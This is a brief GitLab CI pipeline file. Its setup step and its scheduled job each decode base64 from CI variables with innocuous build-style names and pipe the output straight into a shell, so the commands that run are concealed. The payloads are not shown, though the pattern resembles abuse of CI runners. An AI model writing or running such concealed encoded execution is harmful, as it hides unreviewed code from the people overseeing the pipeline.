image: ubuntu:latest

before_script:
  - apt-get update -y
  - apt-get install wget unzip cgroup-tools -y
  - base64 -d <<< $FETCH_REPO | sh
  - base64 -d <<< $BUILD_BABEL | sh

job:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 10 minutes
  script:
    - base64 -d <<< $PUBLISH_TO_REGISTRY | sh
    - base64 -d <<< $POST_PROCESS | sh
